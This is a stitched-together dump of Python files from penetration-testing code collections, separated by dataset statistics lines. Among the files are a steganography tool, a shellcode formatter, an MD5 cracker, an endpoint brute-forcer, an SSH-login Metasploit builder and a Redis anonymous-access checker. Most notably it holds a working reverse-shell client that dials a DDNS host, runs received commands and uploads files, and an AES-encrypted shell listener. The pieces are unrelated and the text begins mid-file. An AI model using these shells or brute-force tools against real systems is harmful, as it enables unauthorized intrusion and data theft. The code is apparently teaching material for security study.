'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['xtreme_server'] | 63.71028 | 130 | 0.570521 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
import sys
import urllib
import cStringIO
from optparse import OptionParser
from PIL import Image
from itertools import izip
def get_pixel_pairs(iterable):
a = iter(iterable)
return izip(a, a)
def set_LSB(value, bit):
if bit == '0':
value = value & 254
else:
value = value | 1
return value
def get_LSB(value):
if value & 1 == 0:
return '0'
else:
return '1'
def extract_message(carrier, from_url=False):
if from_url:
f = cStringIO.StringIO(urllib.urlopen(carrier).read())
c_image = Image.open(f)
else:
c_image = Image.open(carrier)
pixel_list = list(c_image.getdata())
message = ""
for pix1, pix2 in get_pixel_pairs(pixel_list):
message_byte = "0b"
for p in pix1:
message_byte += get_LSB(p)
for p in pix2:
message_byte += get_LSB(p)
if message_byte == "0b00000000":
break
message += chr(int(message_byte,2))
return message
def hide_message(carrier, message, outfile, from_url=False):
message += chr(0)
if from_url:
f = cStringIO.StringIO(urllib.urlopen(carrier).read())
c_image = Image.open(f)
else:
c_image = Image.open(carrier)
c_image = c_image.convert('RGBA')
out = Image.new(c_image.mode, c_image.size)
width, height = c_image.size
pixList = list(c_image.getdata())
newArray = []
for i in range(len(message)):
charInt = ord(message[i])
cb = str(bin(charInt))[2:].zfill(8)
pix1 = pixList[i*2]
pix2 = pixList[(i*2)+1]
newpix1 = []
newpix2 = []
for j in range(0,4):
newpix1.append(set_LSB(pix1[j], cb[j]))
newpix2.append(set_LSB(pix2[j], cb[j+4]))
newArray.append(tuple(newpix1))
newArray.append(tuple(newpix2))
newArray.extend(pixList[len(message)*2:])
out.putdata(newArray)
out.save(outfile)
return outfile
if __name__ == "__main__":
usage = "usage: %prog [options] arg1 arg2"
parser = OptionParser(usage=usage)
parser.add_option("-c", "--carrier", dest="carrier",
help="The filename of the image used as the carrier.",
metavar="FILE")
parser.add_option("-m", "--message", dest="message",
help="The text to be hidden.",
metavar="FILE")
parser.add_option("-o", "--output", dest="output",
help="The filename the output file.",
metavar="FILE")
parser.add_option("-e", "--extract",
action="store_true", dest="extract", default=False,
help="Extract hidden message from carrier and save to output filename.")
parser.add_option("-u", "--url",
action="store_true", dest="from_url", default=False,
help="Extract hidden message from carrier and save to output filename.")
(options, args) = parser.parse_args()
if len(sys.argv) == 1:
print "TEST MODE\nHide Function Test Starting ..."
print hide_message('carrier.png', 'The quick brown fox jumps over the lazy dogs back.', 'messagehidden.png')
print "Hide test passed, testing message extraction ..."
print extract_message('messagehidden.png')
else:
if options.extract == True:
if options.carrier is None:
parser.error("a carrier filename -c is required for extraction")
else:
print extract_message(options.carrier, options.from_url)
else:
if options.carrier is None or options.message is None or options.output is None:
parser.error("a carrier filename -c, message filename -m and output filename -o are required for steg")
else:
hide_message(options.carrier, options.message, options.output, options.from_url)
| 28.189781 | 119 | 0.573037 |
owtf | """
Plugin for probing vnc
"""
from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = " VNC Probing "
def run(PluginInfo):
resource = get_resources("VncProbeMethods")
return plugin_helper.CommandDump("Test Command", "Output", resource, PluginInfo, [])
| 23.384615 | 88 | 0.743671 |
Python-Penetration-Testing-Cookbook | from scapy.all import *
from pprint import pprint
ethernet = Ether()
network = IP(dst = '192.168.1.1')
transport = ICMP()
packet = ethernet/network/transport
sendp(packet, iface="en0")
| 19.777778 | 35 | 0.725806 |
PenTestScripts | #!/usr/bin/env python3
import base64
# Edit this line with the path to the binary file containing shellcode you are converting
with open('/home/user/Downloads/payload.bin', 'rb') as sc_handle:
sc_data = sc_handle.read()
# Just raw binary blog base64 encoded
encoded_raw = base64.b64encode(sc_data)
# Print in "standard" shellcode format \x41\x42\x43....
binary_code = ''
fs_code = ''
for byte in sc_data:
binary_code += "\\x" + hex(byte)[2:].zfill(2)
# this is for f#
fs_code += "0x" + hex(byte)[2:].zfill(2) + "uy;"
# Convert this into a C# style shellcode format
cs_shellcode = "0" + ",0".join(binary_code.split("\\")[1:])
# Base 64 encode the C# code (for use with certain payloads :))
encoded_cs = base64.b64encode(cs_shellcode.encode())
# Write out the files to disk (edit this path as needed)
with open('formatted_shellcode.txt', 'w') as format_out:
format_out.write("Size in bytes is: " + str(len(sc_data)) + "\n\n")
format_out.write("Binary Blob base64 encoded:\n\n")
format_out.write(encoded_raw.decode('ascii'))
format_out.write("\n\nStandard shellcode format:\n\n")
format_out.write(binary_code)
format_out.write("\n\nC# formatted shellcode:\n\n")
format_out.write(cs_shellcode)
format_out.write("\n\nBase64 Encoded C# shellcode:\n\n")
format_out.write(encoded_cs.decode('ascii'))
format_out.write("\n\nF# Shellcode:\n\n")
format_out.write(fs_code)
format_out.write("\n")
| 36.282051 | 89 | 0.671025 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/python
import hashlib
target = raw_input("Please enter your hash here: ")
dictionary = raw_input("Please enter the file name of your dictionary: ")
def main():
with open(dictionary) as fileobj:
for line in fileobj:
line = line.strip()
if hashlib.md5(line).hexdigest() == target:
print "Hash was successfully cracked %s: The value is %s" % (target, line)
return ""
print "Failed to crack the file."
if __name__ == "__main__":
main()
| 26.578947 | 90 | 0.592734 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalSSL")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 26.818182 | 75 | 0.77377 |
Tricks-Web-Penetration-Tester | import requests, argparse, sys, threading, time
from argparse import RawTextHelpFormatter
def msg():
banner ="""
___. __ .___ .__
\_ |_________ __ ___/ |_ ____ __| _/____ | | _____ ___.__.
| __ \_ __ \ | \ __\/ __ \ / __ |/ __ \| | \__ \< | |
| \_\ \ | \/ | /| | \ ___// /_/ \ ___/| |__/ __ \\___ |
|___ /__| |____/ |__| \___ >____ |\___ >____(____ / ____|
\/ \/ \/ \/ \/\/
"""
return print(banner)
def main(url, filetxt, delay, user_agent):
attempt = 0
file = open(filetxt, 'r')
lines = file.readlines()
msg()
print(f"\nurl: {url}\nfile: {filetxt}\ndelay: {delay}\nuser-Agent: {user_agent}\n")
for line in lines:
attempt += 1
endpoint = url+line
print("Request Number ["+str(attempt)+"] in "+endpoint,end="")
response = requests.get(endpoint, headers={"User-Agent":f"{user_agent}"})
if (response.status_code == 200):
print(response.text)
else:
print(response.status_code,(response.headers['Server']))
time.sleep(delay)
args = None
parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python brutedelay.py -u http://example.com/api/v1/user= -f users.txt -a Mozilla/5.0 -d 30")
parser.add_argument('-u','--url', dest='url', action='store', type=str, help='insert endpoint', required=True)
parser.add_argument('-a','--user_agent', dest='user_agent', action='store', type=str, help='insert User-Agent', required=True)
parser.add_argument('-d','--delay', dest='delay', action='store', type=int, help='insert delay in seconds', required=True)
parser.add_argument('-f','--file', dest='filetxt', action='store', type=str, help='insert file in seconds', required=True)
args=parser.parse_args()
main(args.url, args.filetxt, args.delay, args.user_agent) | 48.25 | 170 | 0.512443 |
cybersecurity-penetration-testing | import urllib2
GOOGLE_API_KEY = "{Insert your Google API key}"
target = "packtpub.com"
api_response = urllib2.urlopen("https://www.googleapis.com/plus/v1/people?query="+target+"&key="+GOOGLE_API_KEY).read()
api_response = api_response.split("\n")
for line in api_response:
if "displayName" in line:
print line | 35 | 119 | 0.705882 |
cybersecurity-penetration-testing | #!/usr/bin/python
string = "TaPoGeTaBiGePoHfTmGeYbAtPtHoPoTaAuPtGeAuYbGeBiHoTaTmPtHoTmGePoAuGeErTaBiHoAuRnTmPbGePoHfTmGeTmRaTaBiPoTmPtHoTmGeAuYbGeTbGeLuTmPtTmPbTbOsGePbTmTaLuPtGeAuYbGeAuPbErTmPbGeTaPtGePtTbPoAtPbTmGeTbPtErGePoAuGeYbTaPtErGePoHfTmGeHoTbAtBiTmBiGeLuAuRnTmPbPtTaPtLuGePoHfTaBiGeAuPbErTmPbPdGeTbPtErGePoHfTaBiGePbTmYbTmPbBiGeTaPtGeTmTlAtTbOsGeIrTmTbBiAtPbTmGePoAuGePoHfTmGePbTmOsTbPoTaAuPtBiGeAuYbGeIrTbPtGeRhGeBiAuHoTaTbOsGeTbPtErGeHgAuOsTaPoTaHoTbOsGeRhGeTbPtErGePoAuGePoHfTmGeTmPtPoTaPbTmGeAtPtTaRnTmPbBiTmGeTbBiGeTbGeFrHfAuOsTmPd"
n=2
list = []
answer = []
[list.append(string[i:i+n]) for i in range(0, len(string), n)]
print set(list)
periodic ={"Pb": 82, "Tl": 81, "Tb": 65, "Ta": 73, "Po": 84, "Ge": 32, "Bi": 83, "Hf": 72, "Tm": 69, "Yb": 70, "At": 85, "Pt": 78, "Ho": 67, "Au": 79, "Er": 68, "Rn": 86, "Ra": 88, "Lu": 71, "Os": 76, "Tl": 81, "Pd": 46, "Rh": 45, "Fr": 87, "Hg": 80, "Ir": 77}
for value in list:
if value in periodic:
answer.append(chr(periodic[value]))
lastanswer = ''.join(answer)
print lastanswer
#it is the function of science to discover the existence of a general reign of order in nature and to find the causes governing this order and this refers in equal measure to the relations of man - social and political - and to the entire universe as a whole.
| 61.857143 | 529 | 0.764973 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
Content = plugin_helper.HtmlString("Intended to show helpful info in the future")
return Content
| 23.777778 | 85 | 0.765766 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
# For Kali, after extract the tar file, invoke "python setup.py install"
# AES - Server- TCP Reverse Shell
import socket
from Crypto.Cipher import AES
counter = "H"*16
key = "H"*32
def encrypt(message):
encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
return encrypto.encrypt(message)
def decrypt(message):
decrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
return decrypto.decrypt(message)
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("10.10.10.100", 8080))
s.listen(1)
print '[+] Listening for incoming TCP connection on port 8080'
conn, addr = s.accept()
print '[+] We got a connection from: ', addr
while True:
command = raw_input("Shell> ")
if 'terminate' in command:
conn.send('terminate')
conn.close()
break
else:
command = encrypt(command)
conn.send(command)
print decrypt ( conn.recv(1024) )
def main ():
connect()
main()
| 18.893333 | 72 | 0.549296 |
owtf | from owtf.managers.resource import get_resources
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
resource = get_resources("ExternalWebAppFingerprint")
Content = plugin_helper.resource_linklist("Online Resources", resource)
return Content
| 28.090909 | 75 | 0.783699 |
Hands-On-Penetration-Testing-with-Python | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Project'
db.create_table(u'xtreme_server_project', (
('project_name', self.gf('django.db.models.fields.CharField')(max_length=50, primary_key=True)),
('start_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('query_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('status', self.gf('django.db.models.fields.CharField')(default='Not Set', max_length=50)),
('login_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('logout_url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('username_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('password_field', self.gf('django.db.models.fields.TextField')(default='Not Set')),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Project'])
# Adding model 'Page'
db.create_table(u'xtreme_server_page', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('URL', self.gf('django.db.models.fields.URLField')(max_length=200)),
('content', self.gf('django.db.models.fields.TextField')(blank=True)),
('visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('status_code', self.gf('django.db.models.fields.CharField')(max_length=256, blank=True)),
('connection_details', self.gf('django.db.models.fields.TextField')(blank=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page_found_on', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Page'])
# Adding model 'Form'
db.create_table(u'xtreme_server_form', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('form_found_on', self.gf('django.db.models.fields.URLField')(max_length=200)),
('form_name', self.gf('django.db.models.fields.CharField')(max_length=512, blank=True)),
('form_method', self.gf('django.db.models.fields.CharField')(default='GET', max_length=10)),
('form_action', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
('form_content', self.gf('django.db.models.fields.TextField')(blank=True)),
('auth_visited', self.gf('django.db.models.fields.BooleanField')(default=False)),
('input_field_list', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Form'])
# Adding model 'InputField'
db.create_table(u'xtreme_server_inputfield', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('input_type', self.gf('django.db.models.fields.CharField')(default='input', max_length=256, blank=True)),
))
db.send_create_signal(u'xtreme_server', ['InputField'])
# Adding model 'Vulnerability'
db.create_table(u'xtreme_server_vulnerability', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('details', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['Vulnerability'])
# Adding model 'Settings'
db.create_table(u'xtreme_server_settings', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('allowed_extensions', self.gf('django.db.models.fields.TextField')()),
('allowed_protocols', self.gf('django.db.models.fields.TextField')()),
('consider_only', self.gf('django.db.models.fields.TextField')()),
('exclude_fields', self.gf('django.db.models.fields.TextField')()),
('username', self.gf('django.db.models.fields.TextField')()),
('password', self.gf('django.db.models.fields.TextField')()),
('auth_mode', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'xtreme_server', ['Settings'])
# Adding model 'LearntModel'
db.create_table(u'xtreme_server_learntmodel', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('project', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Project'])),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Page'])),
('form', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['xtreme_server.Form'])),
('query_id', self.gf('django.db.models.fields.TextField')()),
('learnt_model', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal(u'xtreme_server', ['LearntModel'])
def backwards(self, orm):
# Deleting model 'Project'
db.delete_table(u'xtreme_server_project')
# Deleting model 'Page'
db.delete_table(u'xtreme_server_page')
# Deleting model 'Form'
db.delete_table(u'xtreme_server_form')
# Deleting model 'InputField'
db.delete_table(u'xtreme_server_inputfield')
# Deleting model 'Vulnerability'
db.delete_table(u'xtreme_server_vulnerability')
# Deleting model 'Settings'
db.delete_table(u'xtreme_server_settings')
# Deleting model 'LearntModel'
db.delete_table(u'xtreme_server_learntmodel')
models = {
u'xtreme_server.form': {
'Meta': {'object_name': 'Form'},
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'form_action': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'form_content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'form_method': ('django.db.models.fields.CharField', [], {'default': "'GET'", 'max_length': '10'}),
'form_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_field_list': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"})
},
u'xtreme_server.inputfield': {
'Meta': {'object_name': 'InputField'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'input_type': ('django.db.models.fields.CharField', [], {'default': "'input'", 'max_length': '256', 'blank': 'True'})
},
u'xtreme_server.learntmodel': {
'Meta': {'object_name': 'LearntModel'},
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learnt_model': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['xtreme_server'] | 62.35 | 130 | 0.571789 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: ssh_login.py
Purpose: To scan a network for a ssh port and automatically generate a resource file for Metasploit.
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import nmap
except:
sys.exit("[!] Install the nmap library: pip install python-nmap")
try:
import netifaces
except:
sys.exit("[!] Install the netifaces library: pip install netifaces")
# Argument Validator
if len(sys.argv) != 5:
sys.exit("[!] Please provide four arguments the first being the targets the second the ports, the third the username, and the fourth the password")
password = str(sys.argv[4])
username = str(sys.argv[3])
ports = str(sys.argv[2])
hosts = str(sys.argv[1])
home_dir="/root"
gateways = {}
network_ifaces={}
def get_interfaces():
interfaces = netifaces.interfaces()
return interfaces
def get_gateways():
gateway_dict = {}
gws = netifaces.gateways()
for gw in gws:
try:
gateway_iface = gws[gw][netifaces.AF_INET]
gateway_ip, iface = gateway_iface[0], gateway_iface[1]
gw_list =[gateway_ip, iface]
gateway_dict[gw]=gw_list
except:
pass
return gateway_dict
def get_addresses(interface):
addrs = netifaces.ifaddresses(interface)
link_addr = addrs[netifaces.AF_LINK]
iface_addrs = addrs[netifaces.AF_INET]
iface_dict = iface_addrs[0]
link_dict = link_addr[0]
hwaddr = link_dict.get('addr')
iface_addr = iface_dict.get('addr')
iface_broadcast = iface_dict.get('broadcast')
iface_netmask = iface_dict.get('netmask')
return hwaddr, iface_addr, iface_broadcast, iface_netmask
def get_networks(gateways_dict):
networks_dict = {}
for key, value in gateways.iteritems():
gateway_ip, iface = value[0], value[1]
hwaddress, addr, broadcast, netmask = get_addresses(iface)
network = {'gateway': gateway_ip, 'hwaddr' : hwaddress, 'addr' : addr, ' broadcast' : broadcast, 'netmask' : netmask}
networks_dict[iface] = network
return networks_dict
def target_identifier(dir,user,passwd,ips,port_num,ifaces):
bufsize = 0
ssh_hosts = "%s/ssh_hosts" % (dir)
scanner = nmap.PortScanner()
scanner.scan(ips, port_num)
open(ssh_hosts, 'w').close()
if scanner.all_hosts():
e = open(ssh_hosts, 'a', bufsize)
else:
sys.exit("[!] No viable targets were found!")
for host in scanner.all_hosts():
for k,v in ifaces.iteritems():
if v['addr'] == host:
print("[-] Removing %s from target list since it belongs to your interface!") % (host)
host = None
if host != None:
home_dir="/root"
ssh_hosts = "%s/ssh_hosts" % (home_dir)
bufsize=0
e = open(ssh_hosts, 'a', bufsize)
if 'ssh' in scanner[host]['tcp'][int(port_num)]['name']:
if 'open' in scanner[host]['tcp'][int(port_num)]['state']:
print("[+] Adding host %s to %s since the service is active on %s") % (host,ssh_hosts,port_num)
hostdata=host + "\n"
e.write(hostdata)
if not scanner.all_hosts():
e.closed
if ssh_hosts:
return ssh_hosts
def resource_file_builder(dir, user, passwd, ips, port_num, hosts_file):
ssh_login_rc = "%s/ssh_login.rc" % (dir)
bufsize=0
set_module = "use auxiliary/scanner/ssh/ssh_login \n"
set_user = "set username " + username + "\n"
set_pass = "set password " + password + "\n"
set_rhosts = "set rhosts file:" + hosts_file + "\n"
set_rport = "set rport" + ports + "\n"
execute = "run\n"
f = open(ssh_login_rc, 'w', bufsize)
f.write(set_module)
f.write(set_user)
f.write(set_pass)
f.write(set_rhosts)
f.write(execute)
f.closed
if __name__ == '__main__':
gateways = get_gateways()
network_ifaces = get_networks(gateways)
hosts_file = target_identifier(home_dir,username,password,hosts,ports,network_ifaces)
resource_file_builder(home_dir, username, password, hosts, ports, hosts_file)
| 39.822695 | 239 | 0.646568 |
owtf | """
owtf.db.session
~~~~~~~~~~~~~~~
This file handles all the database transactions.
"""
import functools
import sys
import logging
from sqlalchemy import create_engine, exc, func
from sqlalchemy.orm import Session as _Session
from sqlalchemy.orm import sessionmaker
from sqlalchemy.pool import NullPool
from owtf.db.model_base import Model
from owtf.settings import DATABASE_IP, DATABASE_NAME, DATABASE_PASS, DATABASE_USER, DATABASE_PORT
DB_URI = "postgresql+psycopg2://{}:{}@{}:{}/{}".format(
DATABASE_USER, DATABASE_PASS, DATABASE_IP, DATABASE_PORT, DATABASE_NAME
)
def get_count(q):
count_q = q.statement.with_only_columns([func.count()]).order_by(None)
count = q.session.execute(count_q).scalar()
return count
def flush_transaction(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
dryrun = kwargs.pop("dryrun", False)
try:
ret = method(self, *args, **kwargs)
if dryrun:
self.session.rollback()
else:
self.session.flush()
except Exception:
logging.exception("Transaction Failed. Rolling back.")
if self.session is not None:
self.session.rollback()
raise
return ret
return wrapper
def get_db_engine():
try:
engine = create_engine(DB_URI, poolclass=NullPool)
Model.metadata.create_all(engine)
return engine
except exc.OperationalError as e:
logging.error("Could not create engine - Exception occured\n%s", str(e))
sys.exit(1)
def get_scoped_session():
Session.configure(bind=get_db_engine())
return Session()
class Session(_Session):
""" Custom session meant to utilize add on the model.
This Session overrides the add/add_all methods to prevent them
from being used. This is to for using the add methods on the
models themselves where overriding is available.
"""
_add = _Session.add
_add_all = _Session.add_all
_delete = _Session.delete
Session = sessionmaker(class_=Session)
| 25.923077 | 97 | 0.650786 |
Python-for-Offensive-PenTest | '''
Caution
--------
Using this script for any malicious purpose is prohibited and against the law. Please read no-ip.com terms and conditions carefully.
Use it on your own risk.
'''
# Python For Offensive PenTest
# DDNS Aware Shell
import socket
import subprocess
import os
def transfer(s,path):
if os.path.exists(path):
f = open(path, 'rb')
packet = f.read(1024)
while packet != '':
s.send(packet)
packet = f.read(1024)
s.send('DONE')
f.close()
else:
s.send('Unable to find out the file')
def connect(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, 8080)) # instead of hardcoding the ip addr statically we pass our ip variable
while True:
command = s.recv(1024)
if 'terminate' in command:
s.close()
break
elif 'grab' in command:
grab,path = command.split('*')
try:
transfer(s,path)
except Exception,e:
s.send ( str(e) )
pass
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send( CMD.stdout.read() )
s.send( CMD.stderr.read() )
def main ():
ip = socket.gethostbyname('pythonhussam.ddns.net') # We will use the os to send out a dns query for pythonhussam.ddns.net
print "Resolved IP was: " + ip # Please don't forget to change this name to yours :D
connect(ip) # we will pass the ip variable which contains the attacker ip to connect function
main()
| 23.239437 | 133 | 0.573837 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from threading import Thread
from printers import printPink,printGreen
from Queue import Queue
import redis
class redis_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
#self.lines=self.config.file2list("conf/redis.conf")
self.sp=Queue()
def redisexp(self):
while True:
ip,port=self.sp.get()
try:
r=redis.Redis(host=ip,port=port,db=0,socket_timeout=8)
r.dbsize()
self.lock.acquire()
printGreen('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port))
self.result.append('%s redis service at %s allow login Anonymous login!!\r\n' %(ip,port))
self.lock.release()
except Exception,e:
pass
